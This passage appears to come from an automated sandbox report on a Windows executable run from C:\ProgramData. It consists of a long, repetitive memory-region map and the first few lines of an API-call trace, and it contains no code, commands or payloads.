media\\win7_scenic-demoshort_raw.wtv") Region: id = 3220 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 3221 start_va = 0x4120000 end_va = 0x4120fff entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3222 start_va = 0x4130000 end_va = 0x4130fff entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 3223 start_va = 0x4140000 end_va = 0x417ffff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 3224 start_va = 0x4660000 end_va = 0x475ffff entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 3225 start_va = 0x7ef77000 end_va = 0x7ef79fff entry_point = 0x0 region_type = private name = "private_0x000000007ef77000" filename = "" Region: id = 3226 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3227 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3228 start_va = 0x40f0000 end_va = 0x40f0fff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3229 start_va = 0x4180000 end_va = 0x41bffff entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 3230 start_va = 0x41c0000 end_va = 0x42bffff entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 3231 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 3232 start_va = 0x4110000 end_va = 0x4110fff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 3233 start_va = 0x42c0000 end_va = 0x42fffff entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 3234 start_va = 0x4760000 end_va = 0x485ffff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 3235 start_va = 0x7ef7a000 end_va = 0x7ef7cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef7a000" filename = "" Region: id = 3236 start_va = 0x5240000 end_va = 0x551cfff entry_point = 0x5240000 region_type = mapped_file name = "wildlife.wmv" filename = "\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv") Region: id = 3237 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 3238 start_va = 0x40a0000 end_va = 0x40a0fff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 3239 start_va = 0x74940000 end_va = 0x74947fff entry_point = 0x74940000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 3240 start_va = 0x74910000 end_va = 0x74938fff entry_point = 0x74910000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3241 start_va = 0x748f0000 end_va = 0x74903fff entry_point = 0x748f0000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 3242 start_va = 0x748d0000 end_va = 0x748e6fff entry_point = 0x748d0000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 3243 start_va = 0x748c0000 end_va = 0x748c7fff entry_point = 0x748c0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 3244 start_va = 0x748b0000 end_va = 0x748befff entry_point = 0x748b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3245 start_va = 0x748a0000 end_va = 0x748aafff entry_point = 0x748a0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 3246 start_va = 0x74890000 end_va = 0x74898fff entry_point = 0x74890000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3247 start_va = 0x74880000 end_va = 0x7488cfff entry_point = 0x74880000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 3248 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3249 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3250 start_va = 0x1cc0000 end_va = 0x1cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 3251 start_va = 0x1e30000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3252 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3253 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3254 start_va = 0x1cd0000 end_va = 0x1cd0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 3255 start_va = 0x1e80000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3256 start_va = 0x2bb0000 end_va = 0x2caffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 3257 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 3258 start_va = 0x1c60000 end_va = 0x1c60fff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3259 start_va = 0x1c70000 end_va = 0x1c70fff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 3260 start_va = 0x1c60000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3261 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3262 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 3263 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3264 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3265 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3266 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3267 start_va = 0x1e30000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3268 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3269 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3270 start_va = 0x1c60000 end_va = 0x1c60fff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3271 start_va = 0x1c70000 end_va = 0x1c70fff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 3272 start_va = 0x1c80000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 3273 start_va = 0x1cc0000 end_va = 0x1cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 3274 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 3275 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3276 start_va = 0x1cd0000 end_va = 0x1cd0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 3277 start_va = 0x1e80000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3278 start_va = 0x2bb0000 end_va = 0x2caffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 3279 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 3280 start_va = 0x1c60000 end_va = 0x1c60fff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3281 start_va = 0x1c70000 end_va = 0x1c70fff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 3282 start_va = 0x1cc0000 end_va = 0x1cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 3283 start_va = 0x1cd0000 end_va = 0x1cd0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 3284 start_va = 0x1c60000 end_va = 0x1c60fff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3285 start_va = 0x1e30000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3286 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3287 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3288 start_va = 0x1c70000 end_va = 0x1c70fff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 3289 start_va = 0x1e80000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3290 start_va = 0x2bb0000 end_va = 0x2caffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 3291 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 3292 start_va = 0x1c80000 end_va = 0x1c80fff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 3293 start_va = 0x1c90000 end_va = 0x1c90fff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 3294 start_va = 0x1ca0000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3295 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 3296 start_va = 0x2cb0000 end_va = 0x2cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 3297 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3298 start_va = 0x2cc0000 end_va = 0x2cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 3299 start_va = 0x1c60000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3300 start_va = 0x1e30000 end_va = 0x1e30fff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3301 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3302 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3303 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3304 start_va = 0x1e80000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3305 start_va = 0x2bb0000 end_va = 0x2caffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 3306 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 3307 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3308 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3309 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 3310 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3311 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3312 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3313 start_va = 0x1e30000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3314 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3315 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3316 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3317 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3318 start_va = 0x1c60000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3319 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 3320 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3321 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3322 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3323 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3324 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3325 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3326 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3327 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3328 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3329 start_va = 0x1e30000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3330 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3331 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3332 start_va = 0x1c60000 end_va = 0x1c60fff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3333 start_va = 0x1c70000 end_va = 0x1c70fff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 3334 start_va = 0x1c60000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3335 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3336 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 3337 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3338 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3339 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3340 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3341 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3342 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3343 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3344 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3345 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3346 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3347 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3348 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3349 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3350 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3351 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3352 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3353 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3354 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3355 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3356 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3357 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3358 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3359 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3360 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3361 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3362 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3363 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3364 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3365 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3366 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3367 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3368 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3369 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3370 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3371 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3372 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3373 start_va = 0x1e30000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3374 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3375 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3376 start_va = 0x1c60000 end_va = 0x1c60fff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3377 start_va = 0x1c70000 end_va = 0x1c70fff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 3378 start_va = 0x1c60000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3379 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3380 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 3381 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3382 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3383 start_va = 0x1e30000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3384 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3385 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3386 start_va = 0x1c60000 end_va = 0x1c60fff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3387 start_va = 0x1c70000 end_va = 0x1c70fff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 3388 start_va = 0x1c80000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 3389 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 3390 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3391 start_va = 0x1c60000 end_va = 0x1c60fff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3392 start_va = 0x1c70000 end_va = 0x1c70fff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 3393 start_va = 0x1c60000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3394 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3395 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3396 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3397 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3398 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3399 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 3400 start_va = 0x1cc0000 end_va = 0x1cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 3401 start_va = 0x1e30000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3402 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3403 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3404 start_va = 0x1cd0000 end_va = 0x1cd0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 3405 start_va = 0x1c60000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3406 start_va = 0x1ca0000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 3407 start_va = 0x1e80000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3408 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 3409 start_va = 0x2bb0000 end_va = 0x2caffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 3410 start_va = 0x2cb0000 end_va = 0x2daffff entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 3411 start_va = 0x73dc0000 end_va = 0x73eb4fff entry_point = 0x73dd0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 3412 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 3413 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 3414 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 3415 start_va = 0x73d90000 end_va = 0x73db0fff entry_point = 0x73d9145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 3416 start_va = 0x76030000 end_va = 0x76074fff entry_point = 0x760311e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Thread: id = 204 os_tid = 0x550 [0083.818] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x35048e80, dwHighDateTime=0x1d35d7b)) [0083.818] GetCurrentProcessId () returned 0x54c [0083.818] GetCurrentThreadId () returned 0x550 [0083.818] GetTickCount () returned 0x3fbd [0083.818] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=74162998) returned 1 [0083.818] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\BCE1010314.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x55834233)) [0083.818] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.819] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75ce0000 [0083.819] GetProcAddress 